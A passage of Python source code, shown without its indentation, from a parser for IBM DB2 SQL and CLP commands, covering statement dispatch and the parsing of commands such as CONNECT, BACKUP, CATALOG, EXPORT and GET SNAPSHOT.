elif self._match('MODULE'):
self._parse_create_module_statement()
else:
tbspacetype = self._match_one_of([
'REGULAR',
'LONG',
'LARGE',
'TEMPORARY',
'USER',
'SYSTEM',
])
if tbspacetype:
tbspacetype = tbspacetype.value
if tbspacetype in ('USER', 'SYSTEM'):
self._expect('TEMPORARY')
elif tbspacetype == 'TEMPORARY':
tbspacetype = 'SYSTEM'
elif tbspacetype == 'LONG':
tbspacetype = 'LARGE'
self._expect('TABLESPACE')
self._parse_create_tablespace_statement(tbspacetype)
else:
self._expected_one_of([
'ALIAS',
'AUDIT',
'BUFFERPOOL',
'DATABASE',
'DISTINCT',
'EVENT',
'FUNCTION',
'INDEX',
'MODULE',
'NICKNAME',
'NODEGROUP',
'PROCEDURE',
'ROLE',
'SECURITY',
'SEQUENCE',
'SERVER',
'SERVICE',
'TABLE',
'TABLESPACE',
'THRESHOLD',
'TRIGGER',
'TRUSTED',
'TYPE',
'UNIQUE',
'USER',
'VARIABLE',
'VIEW',
'WORK',
'WORKLOAD',
'WRAPPER',
])
elif self._match('DELETE'):
self._parse_delete_statement()
elif self._match('DROP'):
self._parse_drop_statement()
elif self._match_sequence(['DECLARE', 'GLOBAL', 'TEMPORARY', 'TABLE']):
self._parse_declare_global_temporary_table_statement()
elif self._match('DECLARE'):
self._parse_declare_cursor_statement()
elif self._match('EXPLAIN'):
self._parse_explain_statement()
elif self._match_sequence(['FLUSH', 'OPTIMIZATION', 'PROFILE', 'CACHE']):
self._parse_flush_optimization_profile_cache_statement()
elif self._match_sequence(['FREE', 'LOCATOR']):
self._parse_free_locator_statement()
elif self._match('GRANT'):
self._parse_grant_statement()
elif self._match('INSERT'):
self._parse_insert_statement()
elif self._match_sequence(['LOCK', 'TABLE']):
self._parse_lock_table_statement()
elif self._match('MERGE'):
self._parse_merge_statement()
elif self._match_sequence(['REFRESH', 'TABLE']):
self._parse_refresh_table_statement()
elif self._match('RELEASE'):
self._match('TO')
self._expect('SAVEPOINT')
self._parse_release_savepoint_statement()
elif self._match_sequence(['RENAME', 'TABLESPACE']):
self._parse_rename_tablespace_statement()
elif self._match('RENAME'):
self._parse_rename_statement()
elif self._match('REVOKE'):
self._parse_revoke_statement()
elif self._match('ROLLBACK'):
self._parse_rollback_statement()
elif self._match('SAVEPOINT'):
self._parse_savepoint_statement()
elif self._match_sequence(['SET', 'INTEGRITY']):
self._parse_set_integrity_statement()
elif self._match('SET'):
self._parse_set_statement()
elif self._match_sequence(['TRANSFER', 'OWNERSHIP']):
self._parse_transfer_ownership_statement()
elif self._match('TRUNCATE'):
self._parse_truncate_statement()
elif self._match('UPDATE'):
self._parse_update_statement()
else:
self._parse_select_statement()
def parse_routine_prototype(self, tokens):
"""Parses a routine prototype"""
# It's a bit of hack sticking this here. This method doesn't really
# belong here and should probably be in a sub-class (it's only used
# for syntax highlighting function prototypes in the documentation
# system)
self._parse_init(tokens)
# Skip leading whitespace
if self._token().type in (TT.COMMENT, TT.WHITESPACE):
self._index += 1
self._parse_function_name()
# Parenthesized parameter list is mandatory
self._expect('(', prespace=False)
if not self._match(')'):
while True:
self._match_one_of(['IN', 'OUT', 'INOUT'])
self._save_state()
try:
self._expect(TT.IDENTIFIER)
self._parse_datatype()
except ParseError:
self._restore_state()
self._parse_datatype()
else:
self._forget_state()
if not self._match(','):
break
self._expect(')')
# Parse the return type
if self._match('RETURNS'):
if self._match_one_of(['ROW', 'TABLE']):
self._expect('(')
self._parse_ident_type_list()
self._expect(')')
else:
self._parse_datatype()
self._parse_finish()
return self._output
Connection = namedtuple('Connection', ('instance', 'database', 'username', 'password'))
class DB2ZOSScriptParser(DB2ZOSParser):
"""Parser which handles the DB2 UDB CLP dialect.
This class inherits from the DB2 SQL language parser and as such is capable
of parsing all the statements that the parent class is capable of. In
addition, it adds the ability to parse the non-SQL CLP commands (like
IMPORT, EXPORT, LOAD, CREATE DATABASE, etc).
"""
def __init__(self):
super(DB2ZOSScriptParser, self).__init__()
self.connections = []
self.produces = []
self.consumes = []
self.current_user = None
self.current_instance = None
self.current_connection = None
def _match_clp_string(self, password=False):
"""Attempts to match the current tokens as a CLP-style string.
The _match_clp_string() method is used to match a CLP-style string.
The "real" CLP has a fundamentally different style of parser to the
DB2 SQL parser, and includes several behaviours that are difficult
to replicate in this parser (which was primarily targetted at the
DB2 SQL dialect). One of these is the CLP's habit of treating an
unquoted run of non-whitespace tokens as a string, or allowing a
quoted identifier to be treated as a string.
When this method is called it will return a STRING token consisting
of the content of the aforementioned tokens (or None if a CLP-style
string is not found in the source at the current position).
"""
token = self._token()
if token.type == TT.STRING:
# STRINGs are treated verbatim
self._index += 1
elif token.type == TT.IDENTIFIER and token.source[0] == '"':
# Double quoted identifier are converted to STRING tokens
token = Token(TT.STRING, token.value, quote_str(token.value, "'"), token.line, token.column)
self._index += 1
elif not token.type in (TT.TERMINATOR, TT.EOF):
# Otherwise, any run of non-whitepace tokens is converted to a
# single STRING token
start = self._index
self._index += 1
while True:
token = self._token()
if token.type == TT.STRING:
raise ParseError(self._tokens, token, "Quotes (') not permitted in identifier")
if token.type == TT.IDENTIFIER and token.source[0] == '"':
raise ParseError(self._tokens, token, 'Quotes (") not permitted in identifier')
if token.type in (TT.WHITESPACE, TT.COMMENT, TT.TERMINATOR, TT.EOF):
break
self._index += 1
content = ''.join([token.source for token in self._tokens[start:self._index]])
token = Token(TT.STRING, content, quote_str(content, "'"), self._tokens[start].line, self._tokens[start].column)
else:
token = None
if token:
if not (self._output and self._output[-1].type in (TT.INDENT, TT.WHITESPACE)):
self._output.append(Token(TT.WHITESPACE, None, ' ', 0, 0))
if password:
token = Token(TT.PASSWORD, token.value, token.source, token.line, token.column)
self._output.append(token)
# Skip WHITESPACE and COMMENTS
while self._token().type in (TT.COMMENT, TT.WHITESPACE):
if self._token().type == TT.COMMENT or TT.WHITESPACE not in self.reformat:
self._output.append(self._token())
self._index += 1
return token
def _expect_clp_string(self, password=False):
"""Matches the current tokens as a CLP-style string, or raises an error.
See _match_clp_string() above for details of the algorithm.
"""
result = self._match_clp_string(password)
if not result:
raise ParseExpectedOneOfError(self._tokens, self._token(), [TT.PASSWORD if password else TT.STRING])
return result
# PATTERNS ###############################################################
def _parse_clp_string_list(self):
"""Parses a comma separated list of strings.
This is a common pattern in CLP, for example within the LOBS TO clause of
the EXPORT command. The method returns the list of strings found.
"""
result = []
while True:
result.append(self._expect_clp_string().value)
if not self._match(','):
break
return result
def _parse_number_list(self):
"""Parses a comma separated list of number.
This is a common pattern in CLP, for example within the METHOD clause of
the IMPORT or LOAD commands. The method returns the list of numbers
found.
"""
result = []
while True:
result.append(self._expect(TT.NUMBER).value)
if not self._match(','):
break
return result
def _parse_login(self, optional=True, allowchange=False):
"""Parses a set of login credentials"""
username = None
password = None
if self._match('USER'):
username = self._expect_clp_string().value
if self._match('USING'):
password = self._expect_clp_string(password=True).value
if allowchange:
if self._match('NEW'):
password = self._expect_clp_string(password=True).value
self._expect('CONFIRM')
self._expect_clp_string(password=True)
else:
self._match_sequence(['CHANGE', 'PASSWORD'])
elif not optional:
self._expected('USER')
return (username, password)
# COMMANDS ###############################################################
def _parse_activate_database_command(self):
"""Parses an ACTIVATE DATABASE command"""
# ACTIVATE [DATABASE|DB] already matched
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_add_contact_command(self):
"""Parses an ADD CONTACT command"""
# ADD CONTACT already matched
self._expect_clp_string()
self._expect('TYPE')
if self._expect_one_of(['EMAIL', 'PAGE']).value == 'PAGE':
if self._match_sequence(['MAXIMUM', 'PAGE', 'LENGTH']) or self._match_sequence(['MAX', 'LEN']):
self._expect(TT.NUMBER)
self._expect('ADDRESS')
self._expect_clp_string()
if self._match('DESCRIPTION'):
self._expect_clp_string()
def _parse_add_contactgroup_command(self):
"""Parses an ADD CONTACTGROUP command"""
# ADD CONTACTGROUP already matched
self._expect_clp_string()
while True:
self._expect_one_of(['CONTACT', 'GROUP'])
self._expect_clp_string()
if not self_match(','):
break
if self._match('DESCRIPTION'):
self._expect_clp_string()
def _parse_add_dbpartitionnum_command(self):
"""Parses an ADD DBPARTITIONNUM command"""
# ADD DBPARTITIONNUM already matched
if self._match('LIKE'):
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
elif self._match('WITHOUT'):
self._expect('TABLESPACES')
def _parse_add_xmlschema_document_command(self):
"""Parses an ADD XMLSCHEMA DOCUMENT command"""
# ADD XMLSCHEMA DOCUMENT already matched
self._expect('TO')
self._parse_subschema_name()
self._expect('ADD')
self._expect_clp_string()
self._expect('FROM')
self._expect_clp_string()
if self._match('WITH'):
self._expect_clp_string()
if self._match('COMPLETE'):
if self._match('WITH'):
self._expect_clp_string()
self._match_sequence(['ENABLE', 'DECOMPOSITION'])
def _parse_archive_log_command(self):
"""Parses an ARCHIVE LOG command"""
# ARCHIVE LOG already matched
self._expect('FOR')
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
if self._match('USER'):
self._expect_clp_string()
if self._match('USING'):
self._expect_clp_string()
self._parse_db_partitions_clause()
def _parse_attach_command(self):
"""Parses an ATTACH command"""
# ATTACH already matched
if self._match('TO'):
self._expect_clp_string()
self._parse_login(optional=True, allowchange=True)
def _parse_autoconfigure_command(self):
"""Parses an AUTOCONFIGURE command"""
# AUTOCONFIGURE already matched
if self._match('USING'):
while True:
self._expect(TT.IDENTIFIER)
self._expect_one_of([TT.NUMBER, TT.STRING, TT.IDENTIFIER])
if self._match('APPLY'):
break
else:
self._expect('APPLY')
if self._match('DB'):
if self._match('AND'):
self._expect('DBM')
else:
self._expect('ONLY')
elif self._match('NONE'):
pass
else:
self._expected_one_of(['DB', 'NONE'])
self._match_sequence(['ON', 'CURRENT', 'NODE'])
def _parse_backup_command(self):
"""Parses a BACKUP DB command"""
# BACKUP [DATABASE|DB] already matched
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
self._parse_db_partitions_clause()
if self._match('TABLESPACE'):
self._expect('(')
self._parse_ident_list()
self._expect(')')
self._match('ONLINE')
if self._match('INCREMENTAL'):
self._match('DELTA')
if self._match('USE'):
if self._match('SNAPSHOT'):
if self._match('LIBRARY'):
self._expect_clp_string()
elif self._match_one_of(['TSM', 'XBSA']):
if self._match('OPEN'):
self._expect(TT.NUMBER)
self._expect('SESSIONS')
if self._match('OPTIONS'):
self._expect_clp_string()
# XXX Add support for @filename response file
elif self._match('TO'):
self._parse_clp_string_list()
elif self._match('LOAD'):
self._expect_clp_string()
if self._match('OPEN'):
self._expect(TT.NUMBER)
self._expect('SESSIONS')
if self._match('OPTIONS'):
self._expect_clp_string()
# XXX Add support for @filename response file
self._match('DEDUP_DEVICE')
if self._match('WITH'):
self._expect(TT.NUMBER)
self._expect('BUFFERS')
if self._match('BUFFER'):
self._expect(TT.NUMBER)
if self._match('PARALLELISM'):
self._expect(TT.NUMBER)
if self._match('COMPRESS'):
if self._match('COMPRLIB'):
self._expect_clp_string()
self._match('EXCLUDE')
if self._match('COMPROPTS'):
self._expect_clp_string()
if self._match('UTIL_IMPACT_PRIORITY'):
self._match(TT.NUMBER)
if self._match_one_of(['EXCLUDE', 'INCLUDE']):
self._expect('LOGS')
if self._match('WITHOUT'):
self._expect('PROMPTING')
# XXX Add support for BIND command
def _parse_catalog_command(self):
"""Parses a CATALOG command"""
# CATALOG already matched
if self._match_one_of(['USER', 'SYSTEM']):
self._expect('ODBC')
if self._match_sequence(['DATA', 'SOURCE']):
self._expect_clp_string()
else:
self._expect_sequence(['ALL', 'DATA', 'SOURCES'])
elif self._match('ODBC'):
if self._match_sequence(['DATA', 'SOURCE']):
self._expect_clp_string()
else:
self._expect_sequence(['ALL', 'DATA', 'SOURCES'])
elif self._match_one_of(['DATABASE', 'DB']):
self._expect_clp_string()
if self._match('AS'):
self._expect_clp_string()
if self._match('ON'):
self._expect_clp_string()
elif self._match_sequence(['AT', 'NODE']):
self._expect_clp_string()
if self._match('AUTHENTICATION'):
if self._match_sequence(['KERBEROS', 'TARGET', 'PRINCIPAL']):
self._expect_clp_string()
else:
self._expect_one_of([
'SERVER',
'CLIENT',
'SERVER_ENCRYPT',
'SERVER_ENCRYPT_AES',
'KERBEROS',
'DATA_ENCRYPT',
'DATA_ENCRYPT_CMP',
'GSSPLUGIN',
'DCS',
'DCS_ENCRYPT',
])
if self._match('WITH'):
self._expect_clp_string()
elif self._match('DCS'):
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
if self._match('AS'):
self._expect_clp_string()
if self._match('AR'):
self._expect_clp_string()
if self._match('PARMS'):
self._expect_clp_string()
if self._match('WITH'):
self._expect_clp_string()
elif self._match('LDAP'):
if self._match_one_of(['DATABASE', 'DB']):
self._expect_clp_string()
if self._match('AS'):
self._expect_clp_string()
if self._match_sequence(['AT', 'NODE']):
self._expect_clp_string()
if self._match('GWNODE'):
self._expect_clp_string()
if self._match('PARMS'):
self._expect_clp_string()
if self._match('AR'):
self._expect_clp_string()
if self._match_sequence(['KERBEROS', 'TARGET', 'PRINCIPAL']):
self._expect_clp_string()
else:
self._expect_one_of([
'SERVER',
'CLIENT',
'SERVER_ENCRYPT',
'SERVER_ENCRYPT_AES',
'KERBEROS',
'DCS',
'DCS_ENCRYPT',
'DATA_ENCRYPT',
'GSSPLUGIN',
])
if self._match('WITH'):
self._expect_clp_string()
elif self._match('NODE'):
self._expect_clp_string()
self._expect('AS')
self._expect_clp_string()
else:
self._expected_one_of(['DATABASE', 'DB', 'NODE'])
self._parse_login(optional=True, allowchange=False)
else:
self._match('ADMIN')
if self._match_sequence(['LOCAL', 'NODE']):
self._expect_clp_string()
if self._match('INSTANCE'):
self._expect_clp_string()
if self._match('SYSTEM'):
self._expect_clp_string()
if self._match('OSTYPE'):
self._expect(TT.IDENTIFIER)
if self._match('WITH'):
self._expect_clp_string()
elif self._match_sequence(['NPIPE', 'NODE']):
self._expect_clp_string()
self._expect('REMOTE')
self._expect_clp_string()
self._expect('INSTANCE')
self._expect_clp_string()
if self._match('SYSTEM'):
self._expect_clp_string()
if self._match('OSTYPE'):
self._expect(TT.IDENTIFIER)
if self._match('WITH'):
self._expect_clp_string()
elif self._match_sequence(['NETBIOS', 'NODE']):
self._expect_clp_string()
self._expect('REMOTE')
self._expect_clp_string()
self._expect('ADAPTER')
self._expect(TT.NUMBER)
if self._match('REMOTE_INSTANCE'):
self._expect_clp_string()
if self._match('SYSTEM'):
self._expect_clp_string()
if self._match('OSTYPE'):
self._expect(TT.IDENTIFIER)
if self._match('WITH'):
self._expect_clp_string()
elif self._match_one_of(['TCPIP', 'TCPIP4', 'TCPIP6']):
self._expect('NODE')
self._expect_clp_string()
self._expect('REMOTE')
self._expect_clp_string()
self._expect('SERVER')
self._expect_clp_string()
if self._match('SECURITY'):
self._match_one_of(['SOCKS', 'SSL'])
if self._match('REMOTE_INSTANCE'):
self._expect_clp_string()
if self._match('SYSTEM'):
self._expect_clp_string()
if self._match('OSTYPE'):
self._expect(TT.IDENTIFIER)
if self._match('WITH'):
self._expect_clp_string()
else:
self._expected_one_of([
'LOCAL',
'NPIPE',
'NETBIOS',
'TCPIP',
'TCPIP4',
'TCPIP6',
])
def _parse_connect_command(self):
"""Parses a CONNECT command"""
# CONNECT already matched
if self._expect_one_of(['TO', 'RESET']).value == 'RESET':
self.current_connection = None
else:
database = self._expect_clp_string().value
if self._match('IN'):
if self._expect_one_of(['SHARE', 'EXCLUSIVE']).value == 'EXCLUSIVE':
self._expect('MODE')
if self._match('ON'):
self._expect('SINGLE')
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
else:
self._expect('MODE')
(username, password) = self._parse_login(optional=True, allowchange=True)
self.current_connection = Connection(self.current_instance, database, username, password)
self.connections.append(self.current_connection)
def _parse_create_database_command(self):
"""Parses a CREATE DATABASE command"""
def parse_tablespace_definition():
self._expect('MANAGED')
self._expect('BY')
if self._match('SYSTEM'):
self._expect('USING')
self._parse_system_container_clause()
elif self._match('DATABASE'):
self._expect('USING')
self._parse_database_container_clause()
elif self._match('AUTOMATIC'):
self._expect('STORAGE')
if self._match('EXTENTSIZE'):
self._expect(TT.NUMBER)
self._match_one_of(['K', 'M'])
if self._match('PREFETCHSIZE'):
self._expect(TT.NUMBER)
self._match_one_of(['K', 'M', 'G'])
if self._match('OVERHEAD'):
self._expect(TT.NUMBER)
if self._match('TRANSFERRATE'):
self._expect(TT.NUMBER)
if self._match('NO'):
self._expect_sequence(['FILE', 'SYSTEM', 'CACHING'])
elif self._match('FILE'):
self._expect_sequence(['SYSTEM', 'CACHING'])
self._parse_tablespace_size_attributes()
# CREATE [DATABASE|DB] already matched
self._expect_clp_string()
# XXX Implement AT DBPARTITIONNUM? (not for general use, etc.)
if self._match('AUTOMATIC'):
self._expect('STORAGE')
self._expect_one_of(['NO', 'YES'])
if self._match('ON'):
self._parse_clp_string_list()
if self._match('DBPATH'):
self._expect('ON')
self._expect_clp_string()
if self._match('ALIAS'):
self._expect_clp_string()
if self._match('USING'):
self._expect('CODESET')
self._expect_clp_string()
if self._match('TERRITORY'):
self._expect_clp_string()
if self._match('COLLATE'):
self._expect('USING')
self._expect(TT.IDENTIFIER)
if self._match('PAGESIZE'):
self._expect(TT.NUMBER)
self._match('K')
if self._match('NUMSEGS'):
self._expect(TT.NUMBER)
if self._match('DFT_EXTENT_SZ'):
self._expect(TT.NUMBER)
self._match('RESTRICTIVE')
if self._match('CATALOG'):
self._expect('TABLESPACE')
parse_tablespace_definition()
if self._match('USER'):
self._expect('TABLESPACE')
parse_tablespace_definition()
if self._match('TEMPORARY'):
self._expect('TABLESPACE')
parse_tablespace_definition()
if self._match('WITH'):
self._expect_clp_string()
if self._match('AUTOCONFIGURE'):
self._parse_autoconfigure_command()
def _parse_create_tools_catalog_command(self):
"""Parses a CREATE TOOLS CATALOG command"""
# CREATE TOOLS CATALOG already matched
self._expect_clp_string()
if self._match('CREATE'):
self._expect('NEW')
self._expect('DATABASE')
self._expect_clp_string()
elif self._match('USE'):
self._expect('EXISTING')
if self._match('TABLESPACE'):
self._expect(TT.IDENTIFIER)
self._expect('DATABASE')
self._expect_clp_string()
self._match('FORCE')
if self._match('KEEP'):
self._expect('INACTIVE')
def _parse_deactivate_database_command(self):
"""Parses a DEACTIVATE DATABASE command"""
# DEACTIVATE [DATABASE|DB] already matched
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_decompose_xml_document(self):
"""Parses a DECOMPOSE XML DOCUMENT command"""
# DECOMPOSE XML DOCUMENT already matched
self._expect_clp_string()
self._expect('XMLSCHEMA')
self._parse_subschema_name()
self._match('VALIDATE')
def _parse_decompose_xml_documents(self):
"""Parses a DECOMPOSE XML DOCUMENTS command"""
# DECOMPOSE XML DOCUMENTS already matched
self._expect('IN')
self._parse_select_statement()
self._expect('XMLSCHEMA')
self._parse_subschema_name()
self._match('VALIDATE')
if self._match('ALLOW'):
self._match('NO')
self._expect('ACCESS')
if self._match('COMMITCOUNT'):
self._expect(TT.NUMBER)
self._match_sequence(['CONTINUE', 'ON', 'ERROR'])
if self._match('MESSAGES'):
self._expect_clp_string()
def _parse_deregister_command(self):
"""Parses a DEREGISTER command"""
# DEREGISTER already matched
self._match_sequence(['DB2', 'SERVER'])
self._match('IN')
self._expect_sequence(['LDAP', 'NODE', TT.IDENTIFIER])
self._parse_login(optional=True, allowchange=False)
def _parse_describe_command(self):
"""Parses a DESCRIBE command"""
# DESCRIBE already matched
table = True
if self._match('TABLE'):
pass
elif self._match_sequence(['INDEXES', 'FOR', 'TABLE']):
pass
elif self._match_sequence(['RELATIONAL', 'DATA']) or self._match_sequence(['XML', 'DATA']) or self._match_sequence(['TEXT', 'SEARCH']):
self._expect_sequence(['INDEXES', 'FOR', 'TABLE'])
elif self._match_sequence(['DATA', 'PARTITIONS', 'FOR', 'TABLE']):
pass
else:
table = False
if table:
self._parse_table_name()
self._match_sequence(['SHOW', 'DETAIL'])
else:
self._match('OUTPUT')
self._save_state()
try:
self._parse_select_statement()
except ParseError:
self._restore_state()
self._parse_call_statement()
else:
self._forget_state()
# XXX Add support for XQUERY?
def _parse_detach_command(self):
"""Parses a DETACH command"""
# DETACH already matched
pass
def _parse_disconnect_command(self):
"""Parses a DISCONNECT command"""
# DISCONNECT already matched
if self._match('ALL'):
self._match('SQL')
self.current_connection = None
elif self._match('CURRENT'):
self.current_connection = None
else:
t = self._expect_clp_string()
if isinstance(self.current_connection.database, basestring) and s.lower() == t.value.lower():
self.current_connection = None
def _parse_drop_contact_command(self):
"""Parses a DROP CONTACT command"""
# DROP CONTACT already matched
self._expect_clp_string()
def _parse_drop_contactgroup_command(self):
"""Parses a DROP CONTACTGROUP command"""
# DROP CONTACTGROUP already matched
self._expect_clp_string()
def _parse_drop_database_command(self):
"""Parses a DROP DATABASE command"""
# DROP [DATABASE|DB] already matched
self._expect_clp_string()
if self._match('AT'):
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
def _parse_drop_dbpartitionnum_verify_command(self):
"""Parses a DROP DBPARTITIONNUM VERIFY command"""
# DROP DBPARTITIONNUM VERIFY already matched
pass
def _parse_drop_tools_catalog_command(self):
"""Parses a DROP TOOLS CATALOG command"""
# DROP TOOLS CATALOG already matched
self._expect_clp_string()
self._expect('IN')
self._expect('DATABASE')
self._expect_clp_string()
self._match('FORCE')
def _parse_echo_command(self):
"""Parses an ECHO command"""
# ECHO already matched
self._match_clp_string()
def _parse_export_command(self):
"""Parses a EXPORT command"""
# EXPORT already matched
self._expect('TO')
self.produces.append((self._expect_clp_string().value, self.current_connection))
self._expect('OF')
self._expect_one_of(['DEL', 'IXF', 'WSF'])
if self._match('LOBS'):
self._expect('TO')
self._parse_clp_string_list()
if self._match('LOBFILE'):
self._parse_clp_string_list()
if self._match_sequence(['XML', 'TO']):
self._parse_clp_string_list()
if self._match('XMLFILE'):
self._parse_clp_string_list()
if self._match('MODIFIED'):
self._expect('BY')
# The syntax of MODIFIED BY is so incongruous with the parser that
# we don't even try and parse it, just skip tokens until we find
# some "normal" syntax again. Unfortunately, this means the error
# handling becomes rather dumb
i = self._index
while True:
if self._token(i).value in [
'XMLSAVESCHEMA',
'METHOD',
'MESSAGES',
'HIERARCHY',
'WITH',
'SELECT',
'VALUES',
]:
while self._index < i:
self._output.append(self._token())
self._index += 1
break
if self._token(i).type == TT.EOF:
raise ParseError("Unable to find end of file-modifiers in EXPORT statement")
i += 1
self._match('XMLSAVESCHEMA')
if self._match('METHOD'):
self._expect('N')
self._expect('(')
self._parse_ident_list()
self._expect(')')
if self._match('MESSAGES'):
self._expect_clp_string()
if self._match('HIERARCHY'):
if self._match('STARTING'):
self._expect(TT.IDENTIFIER)
else:
self._expect('(')
self._parse_ident_list()
self._expect(')')
if self._match('WHERE'):
self._parse_search_condition()
else:
self._parse_select_statement()
# XXX Add support for XQUERY?
def _parse_force_application_command(self):
"""Parses a FORCE APPLICATION command"""
# FORCE APPLICATION already matched
if self._match('('):
self._parse_number_list()
self._expect(')')
else:
self._expect('ALL')
if self._match('MODE'):
self._expect('ASYNC')
def _parse_get_admin_cfg_command(self):
"""Parses a GET ADMIN CFG command"""
# GET ADMIN [CONFIGURATION|CONFIG|CFG] already matched
if self._match('FOR'):
self._expect_sequence(['NODE', TT.IDENTIFIER])
self._parse_login(optional=True, allowchange=False)
def _parse_get_alert_cfg_command(self):
"""Parses a GET ALERT CFG command"""
# GET ALERT [CONFIGURATION|CONFIG|CFG] already matched
self._expect('FOR')
if (
self._match_sequence(['DATABASE', 'MANAGER'])
or self._match_sequence(['DB', 'MANAGER'])
or self._match_one_of(['DBM', 'DATABASES', 'CONTAINERS', 'TABLESPACES'])
):
self._match('DEFAULT')
elif (
self._match('DATABASE')
or self._match_sequence(['TABLESPACE', TT.IDENTIFIER])
or self._match_sequence(['CONTAINER', TT.IDENTIFIER, 'FOR', TT.IDENTIFIER])
):
self._expect('ON')
self._expect_clp_string()
else:
self._expected_one_of([
'DB',
'DBM',
'DATABASE',
'DATABASES',
'TABLESPACE',
'TABLESPACES',
'CONTAINER',
'CONTAINERS',
])
if self._match('USING'):
self._parse_clp_string_list()
def _parse_get_cli_cfg_command(self):
"""Parses a GET CLI CFG command"""
# GET CLI [CONFIGURATION|CONFIG|CFG] already matched
self._match_sequence(['AT', 'GLOBAL', 'LEVEL'])
if self._match_sequence(['FOR', 'SECTION']):
self._expect_clp_string()
def _parse_get_connection_state_command(self):
"""Parses a GET CONNECTION STATE command"""
# GET CONNECTION STATE already matched
pass
def _parse_get_contactgroup_command(self):
"""Parses a GET CONTACTGROUP command"""
# GET CONTACTGROUP already matched
self._expect_clp_string()
def _parse_get_contactgroups_command(self):
"""Parses a GET CONTACTGROUPS command"""
# GET CONTACTGROUPS already matched
pass
def _parse_get_contacts_command(self):
"""Parses a GET CONTACTS command"""
# GET CONTACTS already matched
pass
def _parse_get_db_cfg_command(self):
"""Parses a GET DB CFG command"""
# GET [DATABASE|DB] [CONFIGURATION|CONFIG|CFG] already matched
if self._match('FOR'):
self._expect_clp_string()
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_get_dbm_cfg_command(self):
"""Parses a GET DBM CFG command"""
# GET [DATABASE MANAGER|DB MANAGER|DBM] [CONFIGURATION|CONFIG|CFG] already matched
self._match_sequence(['SHOW', 'DETAIL'])
def _parse_get_dbm_monitor_switches_command(self):
"""Parses a GET DBM MONITOR SWITCHES command"""
# GET [DATABASE MANAGER|DB MANAGER|DBM] MONITOR SWITCHES already matched
self._parse_db_partition_clause()
def _parse_get_description_for_health_indicator_command(self):
"""Parses a GET DESCRIPTION FOR HEALTH INDICATOR command"""
# GET DESCRIPTION FOR HEALTH INDICATOR already matched
self._expect_clp_string()
def _parse_get_notification_list_command(self):
"""Parses a GET NOTIFICATION LIST command"""
# GET [HEALTH] NOTIFICATION [CONTACT] LIST already matched
pass
def _parse_get_health_snapshot_command(self):
"""Parses a GET HEALTH SNAPSHOT command"""
# GET HEALTH SNAPSHOT already matched
self._expect('FOR')
if (
self._match_sequence(['DATABASE', 'MANAGER'])
or self._match_sequence(['DB', 'MANAGER'])
or self._match('DBM')
or self._match_sequence(['ALL', 'DATABASES'])
):
pass
elif self._match_one_of(['ALL', 'DATABASE', 'DB', 'TABLESPACES']):
self._expect('ON')
self._expect_clp_string()
else:
self._expected_one_of([
'DB',
'DATABASE',
'DBM',
'ALL',
'TABLESPACES',
])
self._parse_db_partition_clause()
self._match_sequence(['SHOW', 'DETAIL'])
self._match_sequence(['WITH', 'FULL', 'COLLECTION'])
def _parse_get_instance_command(self):
"""Parses a GET INSTANCE command"""
# GET INSTANCE already matched
pass
def _parse_get_monitor_switches_command(self):
"""Parses a GET MONITOR SWITCHES command"""
# GET MONITOR SWITCHES already matched
self._parse_db_partition_clause()
def _parse_get_recommendations_for_health_indicator_command(self):
"""Parses a GET RECOMMENDATIONS FOR HEALTH INDICATOR command"""
# GET RECOMMENDATIONS FOR HEALTH INDICATOR already matched
self._expect_clp_string()
if self._match('FOR'):
if not self._match('DBM'):
if self._match('TABLESPACE'):
self._expect(TT.IDENTIFIER)
elif self._match('CONTAINER'):
self._expect_clp_string()
self._expect_sequence(['FOR', 'TABLESPACE', TT.IDENTIFIER])
elif self._match('DATABASE'):
pass
else:
self._expected_one_of(['TABLESPACE', 'CONTAINER', 'DATABASE', 'DBM'])
self._expect('ON')
self._expect_clp_string()
self._parse_db_partition_clause()
def _parse_get_routine_command(self):
"""Parses a GET ROUTINE command"""
# GET ROUTINE already matched
self._expect('INTO')
self._expect_clp_string()
self._expect('FROM')
self._match('SPECIFIC')
self._expect('PROCEDURE')
self._parse_routine_name()
self._match_sequence(['HIDE', 'BODY'])
def _parse_get_snapshot_command(self):
"""Parses a GET SNAPSHOT command"""
# GET SNAPSHOT already matched
self._expect('FOR')
if (
self._match_sequence(['DATABASE', 'MANAGER'])
or self._match_sequence(['DB', 'MANAGER'])
or self._match('DBM')
or self._match_sequence(['ALL', 'DCS', 'DATABASES'])
or self._match_sequence(['ALL', 'DATABASES'])
or self._match_sequence(['ALL', 'DCS', 'APPLICATIONS'])
or self._match_sequence(['ALL', 'APPLICATIONS'])
or self._match_sequence(['ALL', 'BUFFERPOOLS'])
or self._match_sequence(['FCM', 'FOR', 'ALL', 'DBPARTITIONNUMS'])
or self._match_sequence(['FCM', 'FOR', 'ALL', 'NODES'])
or (self._match_sequence(['DCS', 'APPLICATION', 'APPLID']) and self._match_clp_string())
or self._match_sequence(['DCS', 'APPLICATION', 'AGENTID', TT.NUMBER])
or (self._match_sequence(['APPLICATION', 'APPLID']) and self._match_clp_string())
or self._match_sequence(['APPLICATION', 'AGENTID', TT.NUMBER])
or (self._match_sequence(['LOCKS', 'FOR', 'APPLICATION', 'APPLID']) and self._match_clp_string())
or self._match_sequence(['LOCKS', 'FOR', 'APPLICATION', 'AGENTID', TT.NUMBER])
or self._match_sequence(['ALL', 'REMOTE_DATABASES'])
or self._match_sequence(['ALL', 'REMOTE_APPLICATIONS'])
):
pass
elif self._match_sequence(['DYNAMIC', 'SQL', 'ON']):
self._expect_clp_string()
self._match_sequence(['WRITE', 'TO', 'FILE'])
elif (
self._match('ALL')
or self._match_sequence(['DCS', 'DATABASE'])
or self._match_sequence(['DCS', 'DB'])
or self._match_sequence(['DCS', 'APPLICATIONS'])
or self._match_one_of([
'DATABASE',
'APPLICATIONS',
'TABLES',
'TABLESPACES',
'LOCKS',
'BUFFERPOOLS',
'REMOTE_DATABASES',
'REMOTE_APPLICATIONS'
])
):
self._expect('ON')
self._expect_clp_string()
else:
self._expected_one_of([
'ALL',
'DCS',
'DB',
'DBM',
'DATABASE',
'FCM',
'DYNAMIC',
'APPLICATION',
